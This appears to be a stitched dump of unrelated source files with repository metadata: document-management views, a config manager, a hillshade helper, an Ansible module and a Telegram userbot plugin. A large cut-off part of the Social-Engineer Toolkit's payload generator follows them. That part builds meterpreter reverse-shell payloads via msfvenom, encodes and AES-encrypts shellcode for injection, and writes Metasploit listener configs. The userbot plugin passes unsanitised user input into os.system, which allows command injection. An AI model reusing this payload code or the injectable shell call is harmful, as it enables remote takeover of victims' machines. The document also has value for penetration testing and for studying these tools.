'title': ungettext(
singular='Submit %(count)d document to the parsing queue?',
plural='Submit %(count)d documents to the parsing queue',
number=queryset.count()
) % {
'count': queryset.count(),
}
}
if queryset.count() == 1:
result.update(
{
'object': queryset.first(),
'title': _(
'Submit document "%s" to the parsing queue'
) % queryset.first()
}
)
return result
def object_action(self, instance, form=None):
instance.submit_for_parsing()
class DocumentTypeSettingsEditView(ExternalObjectMixin, SingleObjectEditView):
external_object_class = DocumentType
external_object_permission = permission_document_type_parsing_setup
external_object_pk_url_kwarg = 'pk'
fields = ('auto_parsing',)
post_action_redirect = reverse_lazy(viewname='documents:document_type_list')
def get_document_type(self):
return self.external_object
def get_extra_context(self):
return {
'object': self.get_document_type(),
'title': _(
'Edit parsing settings for document type: %s.'
) % self.get_document_type()
}
def get_object(self, queryset=None):
return self.get_document_type().parsing_settings
class DocumentTypeSubmitView(FormView):
extra_context = {
'title': _('Submit all documents of a type for parsing.')
}
form_class = DocumentTypeFilteredSelectForm
post_action_redirect = reverse_lazy(viewname='common:tools_list')
def get_form_extra_kwargs(self):
return {
'allow_multiple': True,
'permission': permission_parse_document,
'user': self.request.user
}
def form_valid(self, form):
count = 0
for document_type in form.cleaned_data['document_type']:
for document in document_type.documents.all():
document.submit_for_parsing()
count += 1
messages.success(
message=_(
'%(count)d documents added to the parsing queue.'
) % {
'count': count,
}, request=self.request
)
return HttpResponseRedirect(redirect_to=self.get_success_url())
class ParseErrorListView(SingleObjectListView):
extra_context = {
'hide_object': True,
'title': _('Parsing errors'),
}
view_permission = permission_document_type_parsing_setup
def get_source_queryset(self):
return DocumentVersionParseError.objects.all()
| 31.768473 | 80 | 0.656071 |
05909b7544b41abb1abf7245f32aa48b1ecd21b7 | 8,268 | py | Python | workflow_configuraitons_manager/xml_parsers/variables_manager.py | sontheimer/EBRAINS_ConfigManager | 5bbd8ee048e33d154d7287512d65bdcf2ca1a7d9 | [
"BSD-3-Clause"
] | null | null | null | workflow_configuraitons_manager/xml_parsers/variables_manager.py | sontheimer/EBRAINS_ConfigManager | 5bbd8ee048e33d154d7287512d65bdcf2ca1a7d9 | [
"BSD-3-Clause"
] | null | null | null | workflow_configuraitons_manager/xml_parsers/variables_manager.py | sontheimer/EBRAINS_ConfigManager | 5bbd8ee048e33d154d7287512d65bdcf2ca1a7d9 | [
"BSD-3-Clause"
] | null | null | null | # ------------------------------------------------------------------------------
# Copyright 2020 Forschungszentrum Jülich GmbH and Aix-Marseille Université
# "Licensed to the Apache Software Foundation (ASF) under one or more contributor
# license agreements; and to You under the Apache License, Version 2.0. "
#
# Forschungszentrum Jülich
# Institute: Institute for Advanced Simulation (IAS)
# Section: Jülich Supercomputing Centre (JSC)
# Division: High Performance Computing in Neuroscience
# Laboratory: Simulation Laboratory Neuroscience
# Team: Multi-scale Simulation and Design
#
# ------------------------------------------------------------------------------
# Co-Simulator Imports
from EBRAINS_ConfigManager.workflow_configuraitons_manager.xml_parsers import enums
from EBRAINS_ConfigManager.workflow_configuraitons_manager.xml_parsers import variables
from EBRAINS_ConfigManager.workflow_configuraitons_manager.xml_parsers import constants
from EBRAINS_ConfigManager.workflow_configuraitons_manager.xml_parsers import exceptions
from EBRAINS_ConfigManager.workflow_configuraitons_manager.xml_parsers import utils
class VariablesManager(object):
"""
Manages the variables related to the run-time environment
"""
__logger = None
def __init__(self, logger=None):
self.__logger = logger
self.__dict = {
# Actions XML files location
variables.CO_SIM_ACTIONS_DIR: {
constants.CO_SIM_VARIABLE_DESCRIPTION: 'Path to actions XML files',
constants.CO_SIM_VARIABLE_VALUE: None},
# Empty, TO BE USED AS A FAKE VALUE
variables.CO_SIM_EMPTY: {
constants.CO_SIM_VARIABLE_DESCRIPTION: 'empty string',
constants.CO_SIM_VARIABLE_VALUE: ''},
# Execution Environment <Local|Cluster>
variables.CO_SIM_EXECUTION_ENVIRONMENT: {
constants.CO_SIM_VARIABLE_DESCRIPTION: 'Co-Simulator Execution Environment',
constants.CO_SIM_VARIABLE_VALUE: None},
# Results Output Directory
variables.CO_SIM_RESULTS_DIR: {
constants.CO_SIM_VARIABLE_DESCRIPTION: 'Results files directory location',
constants.CO_SIM_VARIABLE_VALUE: None},
# Routines Directory Path
variables.CO_SIM_ROUTINES_DIR: {
constants.CO_SIM_VARIABLE_DESCRIPTION: 'Co-Simulation Routines directory location',
constants.CO_SIM_VARIABLE_VALUE: None},
}
def get_value(self, variable_name=None):
"""
:param variable_name: The environment variable name which the value is being gotten (requested)
:return: The value of the passed variable name
"""
return self.__dict[variable_name][constants.CO_SIM_VARIABLE_VALUE]
def set_value(self, variable_name=None, variable_value=None):
"""
:param variable_value:
:param variable_name:
:return:
"""
try:
self.__dict[variable_name][constants.CO_SIM_VARIABLE_VALUE] = variable_value
except KeyError:
self.__logger.error('{} has not been declared in the variable manager yet'.format(variable_name))
raise exceptions.CoSimVariableNotFound(co_sim_variable_name=variable_name)
return None
return self.__dict[variable_name]
def set_co_sim_variable_values_from_variables_dict(self, variables_dictionary_source=None):
"""
:param variables_dictionary_source: Dictionary containing Co-Simulation Variables (CO_SIM_*)
:return:
"""
for key, value in variables_dictionary_source.items():
try:
self.__dict[key][constants.CO_SIM_VARIABLE_VALUE] = value
except KeyError:
self.__logger.error('{} is not a defined Co-Simulator variable'.format(key))
return enums.VariablesReturnCodes.VARIABLE_NOT_OK
return enums.VariablesReturnCodes.VARIABLE_OK
def create_variables_from_parameters_dict(self, input_dictionary=None):
"""
Transforms the referenced variables names into its values based on CO_SIM_* variables.
CO_SIM_* variables are those referencing a value in the same XML configuration file.
e.g.
CO_SIM_RUNTIME_RESULTS_DIR -> represents the output path where the results files
will be written/read.
and could be referenced as follows:
<var_186>
<var_name>CO_SIM_VISUALIZATION_FILES_OUTPUT_PATH</var_name>
<var_value>CO_SIM_RUNTIME_RESULTS_DIR/visualizer</var_value>
</var_186>
Environment variables are those defined on the system where the Co-Simulation process is being run.
e.g.
${CO_SIM_TVB_NEST_PATH} -> represents the path where the TVB_NEST repository is located.
and could be referenced as follows:
<var_194>
<var_name>CO_SIM_XML_ACTIONS_DIR</var_name>
<var_value>${CO_SIM_TVB_NEST_PATH}/co_simulator/actions</var_value>
</var_194>
:param input_dictionary:
The private attribute object reference of the dictionary where the
variables will be transformed into its values
:return:
XML_OK: All the referenced variables in the dictionary where properly
interchanged by its values
XML_CO_SIM_VARIABLE_ERROR: The value for a referenced variable could not been obtained
"""
for key, value in input_dictionary.items():
# transforming the CO_SIM_ references into its values
try:
runtime_variable_value = \
utils.transform_co_simulation_variables_into_values(variables_manager=self,
functional_variable_value=value)
except exceptions.CoSimVariableNotFound as CoSimVariableNotFound:
self.__logger.error(CoSimVariableNotFound)
# return enums.XmlManagerReturnCodes.XML_CO_SIM_VARIABLE_ERROR
return enums.ParametersReturnCodes.VARIABLE_NOT_FOUND
# creating the new CO_SIM_ variable
self.__dict[key] = {constants.CO_SIM_VARIABLE_DESCRIPTION: 'created on run time',
constants.CO_SIM_VARIABLE_VALUE: runtime_variable_value}
return enums.ParametersReturnCodes.PARAMETER_OK
def create_co_sim_run_time_variables(self, action_plan_variables_dict=None, action_plan_parameters_dict=None):
"""
Sets RUN TIME Co-Simulation variables based on the content of the variables
and parameters set on the Action Plan XML file
:return:
VARIABLE_OK
"""
# CO_SIM_LAUNCHER
try:
execution_environment = \
self.__dict[variables.CO_SIM_EXECUTION_ENVIRONMENT][constants.CO_SIM_VARIABLE_VALUE]
except KeyError:
self.__logger.error('{} has not been set yet'.format(variables.CO_SIM_EXECUTION_ENVIRONMENT))
return enums.VariablesReturnCodes.VARIABLE_NOT_OK
else:
if execution_environment.upper() == 'LOCAL':
self.__dict[variables.CO_SIM_LAUNCHER] = \
{constants.CO_SIM_VARIABLE_DESCRIPTION: 'launcher created on run time',
constants.CO_SIM_VARIABLE_VALUE: 'mpirun'}
elif execution_environment.upper() == 'CLUSTER':
self.__dict[variables.CO_SIM_LAUNCHER] = \
{constants.CO_SIM_VARIABLE_DESCRIPTION: 'launcher created on run time',
constants.CO_SIM_VARIABLE_VALUE: 'srun'}
else:
self.__logger.error('{} wrong value set. <LOCAL|CLUSTER>'.format(
variables.CO_SIM_EXECUTION_ENVIRONMENT))
return enums.VariablesReturnCodes.VARIABLE_NOT_OK
return enums.VariablesReturnCodes.VARIABLE_OK
| 47.791908 | 114 | 0.641509 |
5a66fcb717c3a9151664741a2074a7f2373f4788 | 383 | py | Python | project/e2c/asgi.py | Tanukium/excel2csv | 44afc6d4ca241f48e12583e6c1209d881f466f49 | [
"MIT"
] | 9 | 2019-01-12T04:19:27.000Z | 2019-03-26T15:22:32.000Z | project/e2c/asgi.py | Tanukium/msemi | 40da6c4942cfffda31ba302ac0b8e6f8be2e86e4 | [
"MIT"
] | 1 | 2021-04-13T18:40:08.000Z | 2021-04-13T18:40:08.000Z | project/e2c/asgi.py | Tanukium/msemi | 40da6c4942cfffda31ba302ac0b8e6f8be2e86e4 | [
"MIT"
] | null | null | null | """
ASGI config for e2c project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'e2c.settings')
application = get_asgi_application()
| 22.529412 | 78 | 0.780679 |
b80ef368c958247ba1870cccbf0f4c08d067bec7 | 1,461 | py | Python | userbot/modules/instamusic.py | PratikGoswamiPM/OpenUserBot | 1ba7845522a5d5619d2705421a303aa82ce35abb | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 1 | 2021-07-18T06:57:28.000Z | 2021-07-18T06:57:28.000Z | userbot/modules/instamusic.py | PratikGoswamiPM/OpenUserBot | 1ba7845522a5d5619d2705421a303aa82ce35abb | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | userbot/modules/instamusic.py | PratikGoswamiPM/OpenUserBot | 1ba7845522a5d5619d2705421a303aa82ce35abb | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | # Originally from Bothub
# Port to UserBot by @PM_The_Angry
from telethon import events
import subprocess
from telethon.errors import MessageEmptyError, MessageTooLongError, MessageNotModifiedError
import io
import asyncio
import time
#from userbot.utils import admin_cmd
from userbot.events import register
from userbot import bot, CMD_HELP
import glob
import os
try:
import instantmusic , subprocess
except:
os.system("pip install instantmusic")
os.system("rm -rf *.mp3")
def bruh(name):
os.system("instantmusic -q -s "+name)
@register(outgoing=True, pattern="^.song(?: |$)(.*)")
async def _(event):
if event.fwd_from:
return
DELAY_BETWEEN_EDITS = 0.3
PROCESS_RUN_TIME = 100
cmd = event.pattern_match.group(1)
reply_to_id = event.message.id
if event.reply_to_msg_id:
reply_to_id = event.reply_to_msg_id
await event.edit("searching song..please wait")
bruh(str(cmd))
l = glob.glob("*.mp3")
loa = l[0]
await event.edit("sending song")
await bot.send_file(
event.chat_id,
loa,
force_document=True,
allow_cache=False,
caption=cmd,
reply_to=reply_to_id
)
os.system("rm -rf *.mp3")
subprocess.check_output("rm -rf *.mp3",shell=True)
CMD_HELP.update({
"instamusic":
".song <songname>"
"\nUsage: For searching songs.\n"
})
| 23.564516 | 91 | 0.640657 |
68ed8bad0fbcb080d3932f731bc01ab9ad6ac8bc | 2,532 | py | Python | lms_code/plots/shading.py | tbenthompson/LMS_public | 1637e461ea269ae127a9da1fdba8e47a180c2ed2 | [
"MIT"
] | null | null | null | lms_code/plots/shading.py | tbenthompson/LMS_public | 1637e461ea269ae127a9da1fdba8e47a180c2ed2 | [
"MIT"
] | null | null | null | lms_code/plots/shading.py | tbenthompson/LMS_public | 1637e461ea269ae127a9da1fdba8e47a180c2ed2 | [
"MIT"
] | null | null | null | from pylab import *
# Taken from http://rnovitsky.blogspot.com/2010/04/using-hillshade-image-as-intensity.html
def set_shade(a,intensity=None,cmap=cm.jet,scale=10.0,azdeg=165.0,altdeg=45.0):
''' sets shading for data array based on intensity layer
or the data's value itself.
inputs:
a - a 2-d array or masked array
intensity - a 2-d array of same size as a (no chack on that)
representing the intensity layer. if none is given
the data itself is used after getting the hillshade values
see hillshade for more details.
cmap - a colormap (e.g matplotlib.colors.LinearSegmentedColormap
instance)
scale,azdeg,altdeg - parameters for hilshade function see there for
more details
output:
rgb - an rgb set of the Pegtop soft light composition of the data and
intensity can be used as input for imshow()
based on ImageMagick's Pegtop_light:
http://www.imagemagick.org/Usage/compose/#pegtoplight'''
if intensity is None:
# hilshading the data
intensity = hillshade(a,scale=10.0,azdeg=165.0,altdeg=45.0)
else:
# or normalize the intensity
intensity = (intensity - intensity.min())/(intensity.max() - intensity.min())
# get rgb of normalized data based on cmap
rgb = cmap((a-a.min())/float(a.max()-a.min()))[:,:,:3]
# form an rgb eqvivalent of intensity
d = intensity.repeat(3).reshape(rgb.shape)
# simulate illumination based on pegtop algorithm.
rgb = 2*d*rgb+(rgb**2)*(1-2*d)
return rgb
def hillshade(data,scale=10.0,azdeg=165.0,altdeg=45.0):
''' convert data to hillshade based on matplotlib.colors.LightSource class.
input:
data - a 2-d array of data
scale - scaling value of the data. higher number = lower gradient
azdeg - where the light comes from: 0 south ; 90 east ; 180 north ;
270 west
altdeg - where the light comes from: 0 horison ; 90 zenith
output: a 2-d array of normalized hilshade
'''
# convert alt, az to radians
az = azdeg*pi/180.0
alt = altdeg*pi/180.0
# gradient in x and y directions
dx, dy = gradient(data/float(scale))
slope = 0.5*pi - arctan(hypot(dx, dy))
aspect = arctan2(dx, dy)
intensity = sin(alt)*sin(slope) + cos(alt)*cos(slope)*cos(-az - aspect - 0.5*pi)
intensity = (intensity - intensity.min())/(intensity.max() - intensity.min())
return intensity
| 44.421053 | 90 | 0.639021 |
cf1a96ce22487299f9e15346ca4ced28f3540a43 | 1,989 | py | Python | plugins/modules/ces_quotas_info.py | shaderecker/ansible-collection-cloud | d347379181c66db8d0c775c6f0647e928a90ba70 | [
"Apache-2.0"
] | null | null | null | plugins/modules/ces_quotas_info.py | shaderecker/ansible-collection-cloud | d347379181c66db8d0c775c6f0647e928a90ba70 | [
"Apache-2.0"
] | null | null | null | plugins/modules/ces_quotas_info.py | shaderecker/ansible-collection-cloud | d347379181c66db8d0c775c6f0647e928a90ba70 | [
"Apache-2.0"
] | 1 | 2021-03-24T06:03:58.000Z | 2021-03-24T06:03:58.000Z | #!/usr/bin/python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
DOCUMENTATION = '''
module: ces_quotas_info
short_description: Get ressource Quotas
extends_documentation_fragment: opentelekomcloud.cloud.otc
version_added: "0.3.0"
author: "Sebastian Gode (@SebastianGode)"
description:
- Get ressource Quotas
requirements: ["openstacksdk", "otcextensions"]
'''
RETURN = '''
quotas:
description: Dictionary of Quotas
returned: changed
type: list
sample: [
{
"id": null,
"name": null,
"resources": [
{
"id": null,
"location": null,
"name": null,
"quota": 100,
"type": "alarm",
"unit": "",
"used": 1
}
]
}
]
'''
EXAMPLES = '''
# Query Alarm Quotas
- opentelekomcloud.cloud.ces_quotas_info:
'''
from ansible_collections.opentelekomcloud.cloud.plugins.module_utils.otc import OTCModule
class CesQuotasInfoModule(OTCModule):
argument_spec = dict()
def run(self):
data = []
query = {}
for raw in self.conn.ces.quotas(**query):
dt = raw.to_dict()
dt.pop('location')
data.append(dt)
self.exit(
changed=False,
quotas=data
)
def main():
module = CesQuotasInfoModule()
module()
if __name__ == '__main__':
main()
| 23.963855 | 89 | 0.591755 |
20f8582b4fe695877eb4c6608b957c6cdb526adc | 40,268 | py | Python | src/core/payloadgen/create_payloads.py | rockstar9788/socialtoolkit | 02e40c6f89d5a78c233449c310b5d3c1e2a12e0b | [
"MIT"
] | null | null | null | src/core/payloadgen/create_payloads.py | rockstar9788/socialtoolkit | 02e40c6f89d5a78c233449c310b5d3c1e2a12e0b | [
"MIT"
] | null | null | null | src/core/payloadgen/create_payloads.py | rockstar9788/socialtoolkit | 02e40c6f89d5a78c233449c310b5d3c1e2a12e0b | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# Import modules
import subprocess
import time
import sys
import os
import re
import socket
import base64
from src.core.setcore import *
from src.core.menu.text import *
from src.core.dictionaries import *
try:
if len(check_options("IPADDR=")) > 2:
ipaddr = check_options("IPADDR=")
else:
ipaddr = ""
except:
ipaddr = ""
me = mod_name()
listener = "notdefined"
definepath = os.getcwd()
sys.path.append(definepath)
port1 = "8080"
port2 = "8081"
operating_system = check_os()
# check stage encoding - shikata ga nai for payload delivery
stage_encoding = check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off":
stage_encoding = "false"
else:
stage_encoding = "true"
configfile = open("/etc/setoolkit/set.config", "r").readlines()
# check the metasploit path
msf_path = meta_path()
# check the config files for all of the flags needed for the file
auto_migrate = check_config("AUTO_MIGRATE=")
meterpreter_multi = check_config("METERPRETER_MULTI_SCRIPT=")
linux_meterpreter_multi = check_config("LINUX_METERPRETER_MULTI_SCRIPT=")
meterpreter_multi_command = check_config("METERPRETER_MULTI_COMMANDS=")
meterpreter_multi_command = meterpreter_multi_command.replace(";", "\n")
linux_meterpreter_multi_command = check_config("LINUX_METERPRETER_MULTI_COMMANDS=")
linux_meterpreter_multi_command = linux_meterpreter_multi_command.replace(";", "\n")
unc_embed = check_config("UNC_EMBED=")
attack_vector = 0
linosx = 0
multiattack = ""
# grab attack vector
if os.path.isfile(userconfigpath + "attack_vector"):
fileopen = open(userconfigpath + "attack_vector", "r")
for line in fileopen:
line = line.rstrip()
if line == "java":
attack_vector = "java"
if line == "multiattack":
attack_vector = "multiattack"
multiattack = open(userconfigpath + "multi_payload", "w")
# here is a place holder for the multi attack java
# multiattack outputs a file called multi_java if
# this file is present it will allow additional
# functionality
multiattack_java = "off"
if os.path.isfile(userconfigpath + "multi_java"):
multiattack_java = "on"
# custom payloadgen
payloadgen = "regular"
if os.path.isfile(userconfigpath + "payloadgen"):
payloadgen = "solo"
#
# grab ipaddr if it hasn't been identified yet
#
if check_options("IPADDR=") == False:
fileopen = open("/etc/setoolkit/set.config", "r")
data = fileopen.read()
match = re.search("AUTO_DETECT=ON", data)
if match:
try:
ipaddr = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ipaddr.connect(('google.com', 0))
ipaddr.settimeout(2)
ipaddr = ipaddr.getsockname()[0]
update_options("IPADDR=" + ipaddr)
except Exception as e:
log(e)
ipaddr = raw_input(
setprompt(["4"], "IP address for the payload listener (LHOST)"))
update_options("IPADDR=" + ipaddr)
# if AUTO_DETECT=OFF prompt for IP Address
match = re.search("AUTO_DETECT=OFF", data)
if match:
ipaddr = raw_input(
setprompt(["4"], "Enter the IP address for the payload (reverse)"))
update_options("IPADDR=" + ipaddr)
# payload selection here
try:
# Specify path to metasploit
path = msf_path
# Specify payload
# this is encoding
encode = ""
# this is payload
choice1 = ""
# this is port
choice3 = ""
if os.path.isfile(userconfigpath + "meterpreter_reverse_tcp_exe"):
fileopen = open(userconfigpath + "meterpreter_reverse_tcp_exe", "r")
for line in fileopen:
# this reads in the first line of the file which happens to be port
# when calling through core
choice3 = line.rstrip()
# change attack_vector to nothing
attack_vector = ""
# specify payload
choice1 = "windows/meterpreter/reverse_tcp"
# encode using backdoored executable
encode = "16"
# if we don't trigger on the standard core api call
if choice1 == "":
#
# USER INPUT: SHOW PAYLOAD MENU 1 #
#
debug_msg(me, "printing 'text.payload_menu_1'", 5)
show_payload_menu1 = create_menu(payload_menu_1_text, payload_menu_1)
choice1 = raw_input(setprompt(["4"], ""))
# default blank then select pyinjector
if choice1 == "":
choice1 = "1"
# check the length and make sure it works
if choice1 != "":
choice1 = check_length(choice1, 8)
# convert it to a string
choice1 = str(choice1)
custom = 0
counter = 0
flag = 0
encode_stop = 0
# Condition testing of 'choice1'
# Will use a dictionary list
if choice1 == "exit":
exit_set()
if choice1 == '':
choice1 = ("1")
if choice1 == '5' or choice1 == '6' or choice1 == '7':
encode_stop = 1
encode = ""
if choice1 == '7':
flag = 1
# here we specify shellcodeexec
if choice1 == '1' or choice1 == '2' or choice1 == '6' or choice1 == '8':
encode_stop = 1
encode = 0
# 11 is the set interactive shell, 12 is set rev http shell and 13 is
# ratte listener
if choice1 == '3' or choice1 == '4' or choice1 == "5":
encoder = 'false'
payloadgen = 'solo'
encode_stop = 1
filewrite = open(userconfigpath + "set.payload", "w")
# select setshell
if choice1 == '3':
filewrite.write("SETSHELL")
# select setshell_reverse
if choice1 == '4':
filewrite.write("SETSHELL_HTTP")
# select ratte
if choice1 == '5':
filewrite.write("RATTE")
filewrite.close()
if choice1 != "7":
# if not then import the payload selection
choice1 = ms_payload_2(choice1)
# don't do courtesy shell
if counter == 0:
courtesyshell = ("")
# if custom
if choice1 == '7':
print_info("Example: /root/custom.exe")
choice1 = raw_input(setprompt(["4"], "Enter the path to your executable"))
if not os.path.isfile(choice1):
while 1:
print_error("ERROR:File not found. Try Again.")
choice1 = raw_input(setprompt(["4"], "Enter the path to your executable"))
if os.path.isfile(choice1): break
update_options("CUSTOM_EXE=%s" % (choice1))
custom = 1
# if we are using our own executable
if custom == 1:
check_write = open(userconfigpath + "custom.exe", "w")
check_write.write("VALID")
check_write.close()
shutil.copyfile("%s" % (choice1), "msf.exe")
shutil.copyfile("msf.exe", userconfigpath + "msf.exe")
# Specify Encoding Option
encoder = "false"
if choice1 == "cmd/multi": update_options("CUSTOM_EXE=CMD/MULTI")
# if we aren't using the set shell
if choice1 != "set/reverse_shell":
# we need to rewrite index.html real quick because it has a parameter
# that could get confusing
if os.path.isfile(userconfigpath + "web_clone/index.html"):
fileopen = open(userconfigpath + "web_clone/index.html", "r")
data = fileopen.read()
data = data.replace("freehugs", "")
os.remove(userconfigpath + "web_clone/index.html")
filewrite = open(userconfigpath + "web_clone/index.html", "w")
filewrite.write(data)
filewrite.close()
# Specify Remote Host if ipaddr.file is missing (should never get here)
if check_options("IPADDR=") == 0:
choice2 = raw_input(setprompt(
["4"], "IP Address of the listener/attacker (reverse) or host/victim (bind shell)"))
update_options("IPADDR=" + choice2)
choice2 = check_options("IPADDR=")
# specify the port for the listener
if choice3 == "":
if choice1 != "shellcode/multipyinject":
if choice1 != "cmd/multi":
if custom == 0:
choice3 = raw_input(setprompt(["4"], "PORT of the listener [443]"))
# here we check if the user really wants to use port 80
if choice3 == "80":
print_warning(
"WARNING: SET Web Server requires port 80 to listen.")
print_warning(
"WARNING: Are you sure you want to proceed with port 80?")
port_choice_option = raw_input(
"\nDo you want to keep port 80? [y/n]")
if port_choice_option == "n":
# reprompt it
choice3 = raw_input(setprompt(["4"], "PORT of listener [443]"))
if choice3 == '':
choice3 = '443'
# this is needed for the set_payload
update_options("PORT=" + choice3)
# if we are using the SET interactive shell then do this
if choice1 == "set/reverse_shell":
encoder = "false"
filewrite = open(userconfigpath + "set.payload.posix", "w")
filewrite.write("true")
filewrite.close()
import src.core.payloadprep
# if were using the multiattack option
if attack_vector == "multiattack":
multiattack.write("MAIN=" + str(choice3) + "\n")
multiattack.write("MAINPAYLOAD=" + str(choice1) + "\n")
# if encoding is required, it will place 1msf.exe first then encode it
# to msf.exe
if encoder == "true":
choice4 = ("raw")
msf_filename = ("1msf.exe")
if encoder == "false":
choice4 = ("exe")
msf_filename = ("msf.exe")
# set choice to blank for ALL PORTS scan
if flag == 0:
portnum = "LPORT=" + choice3
if flag == 1:
portnum = ""
if encode != "BACKDOOR":
# if we aren't using the set reverse shell
if choice1 != "set/reverse_shell":
# if we are using shellcodeexec
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject":
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject":
print ("\nSelect the payload you want to deliver via shellcode injection\n\n 1) Windows Meterpreter Reverse TCP\n 2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager\n 3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager\n 4) Windows Meterpreter (ALL PORTS) Reverse TCP\n")
# select payload
choice9 = raw_input(setprompt(["4"], "Enter the number for the payload [meterpreter_reverse_https]"))
# select default meterpreter reverse tcp
if choice9 == "":
choice9 = "windows/meterpreter/reverse_https"
if choice9 == "1":
choice9 = "windows/meterpreter/reverse_tcp"
# select reverse https
if choice9 == "2":
choice9 = "windows/meterpreter/reverse_https"
# select reverse http
if choice9 == "3":
choice9 = "windows/meterpreter/reverse_http"
# select all ports
if choice9 == "4":
choice9 = "windows/meterpreter/reverse_tcp_allports"
if ipaddr == "":
# grab ipaddr if not defined
ipaddr = check_options("IPADDR=")
if choice1 == "shellcode/alphanum":
print_status("Generating the payload via msfvenom and generating alphanumeric shellcode...")
subprocess.Popen("%smsfvenom -p %s LHOST=%s %s StagerURILength=5 StagerVerifySSLCert=false -e EXITFUNC=thread -e x86/alpha_mixed --format raw BufferRegister=EAX > %s/meterpreter.alpha_decoded" % (meta_path(), choice9, choice2, portnum, userconfigpath), shell=True).wait()
if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject" or choice1 == "cmd/multi":
# here we update set options to specify pyinjection and multipy
update_options("PYINJECTION=ON")
# define, this will eventually be all of our payloads
multipyinject_payload = ""
# clean up old file
if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
os.remove("%s/meta_config_multipyinjector" % (userconfigpath))
# remove any old payload options
if os.path.isfile(userconfigpath + "payload.options.shellcode"):
os.remove(userconfigpath + "payload_options.shellcode")
# this is the file that gets saved with the payload and
# port options
if choice1 != "cmd/multi": payload_options = open(userconfigpath + "payload_options.shellcode", "a")
while 1:
# don't need any options here
if choice1 == "cmd/multi": break
if choice1 == "shellcode/multipyinject":
print ("\nSelect the payload you want to deliver via shellcode injection\n\n 1) Windows Meterpreter Reverse TCP\n 2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager\n 3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager\n 4) Windows Meterpreter (ALL PORTS) Reverse TCP\n 5) Windows Reverse Command Shell\n 6) I'm finished adding payloads.\n")
choice9 = raw_input(
setprompt(["4"], "Enter the number for the payload [meterpreter_reverse_tcp]"))
# select default meterpreter reverse tcp
if choice9 == "" or choice9 == "1":
choice9 = "windows/meterpreter/reverse_tcp"
# select reverse https
if choice9 == "2":
choice9 = "windows/meterpreter/reverse_https"
# select reverse http
if choice9 == "3":
choice9 = "windows/meterpreter/reverse_http"
# select all ports
if choice9 == "4":
choice9 = "windows/meterpreter/reverse_tcp_allports"
if choice9 == "5":
choice9 = "windows/shell/reverse_tcp"
# check the ipaddr
if ipaddr == "":
# grab ipaddr if not defined
ipaddr = check_options("IPADDR=")
# break out if not needed
if choice9 == "6":
break
shellcode_port = raw_input(setprompt(["4"], "Enter the port number [443]"))
if shellcode_port == "": shellcode_port = "443"
# here we prep our meta config to listen on all
# the ports we want - free hugs all around
filewrite = open("%s/meta_config_multipyinjector" % (userconfigpath), "a")
port_check = check_ports("%s/meta_config_multipyinjector" % (userconfigpath), shellcode_port)
if port_check == False:
filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset EnableStageEncoding %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (choice9, stage_encoding, ipaddr, shellcode_port))
filewrite.close()
if choice1 != "cmd/multi":
if validate_ip(choice2) == False:
if choice9 != "windows/meterpreter/reverse_https":
if choice9 != "windows/meterpreter/reverse_http":
print_status("Possible hostname detected, switching to windows/meterpreter/reverse_https")
choice9 == "windows/meterpreter/reverse_https"
if choice9 == "windows/meterpreter/reverse_tcp_allports":
portnum = "LPORT=1"
# fix port num
if "multipyinject" in choice1:
portnum = shellcode_port
else:
portnum = portnum.replace("LPORT=", "")
# meterpreter reverse_tcp
if choice9 == "windows/meterpreter/reverse_tcp":
shellcode = metasploit_shellcode(choice9, choice2, portnum)
# meterpreter reverse_https
if choice9 == "windows/meterpreter/reverse_https":
shellcode = metasploit_shellcode(choice9, choice2, portnum)
# meterpreter reverse_http
if choice9 == "windows/meterpreter/reverse_http":
shellcode = metasploit_shellcode(choice9, choice2, portnum)
# meterpreter tcp allports
if choice9 == "windows/meterpreter/reverse_tcp_allports":
shellcode = metasploit_shellcode(choice9, choice2, portnum)
# windows shell reverse_tcp
if choice9 == "windows/shell/reverse_tcp":
shellcode = metasploit_shellcode(choice9, choice2, portnum)
if choice1 == "shellcode/pyinject":
shellcode_port = portnum.replace("LPORT=", "")
if validate_ip(choice2) == True:
shellcode = shellcode_replace(choice2, shellcode_port, shellcode)
# here we write out the payload and port for later
# use in powershell injection
payload_options.write(choice9 + " " + portnum + ",")
# break out of the loop if we are only using one
# payload else keep on
if choice1 == "shellcode/pyinject": break
multipyinject_payload += shellcode + ","
if choice1 != "cmd/multi":
# get rid of tail comma
if multipyinject_payload.endswith(","):
multipyinject_payload = multipyinject_payload[:-1]
# if we have multiple payloads, use multi injector
if choice1 == "shellcode/multipyinject":
# we first need to encrypt the payload via AES 256
print_status("Encrypting the shellcode via AES 256 encryption..")
secret = os.urandom(32)
shellcode = encryptAES(secret, multipyinject_payload)
print_status("Dynamic cipher key created and embedded into payload.")
filewrite = open("%s/meterpreter.alpha_decoded" % (userconfigpath), "w")
filewrite.write(shellcode)
filewrite.close()
if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject":
# close the pyinjector file for ports and payload
payload_options.close()
# here we are going to encode the payload via base64
fileopen = open("%s/meterpreter.alpha_decoded" % (userconfigpath), "r")
data = fileopen.read()
if payloadgen != "solo":
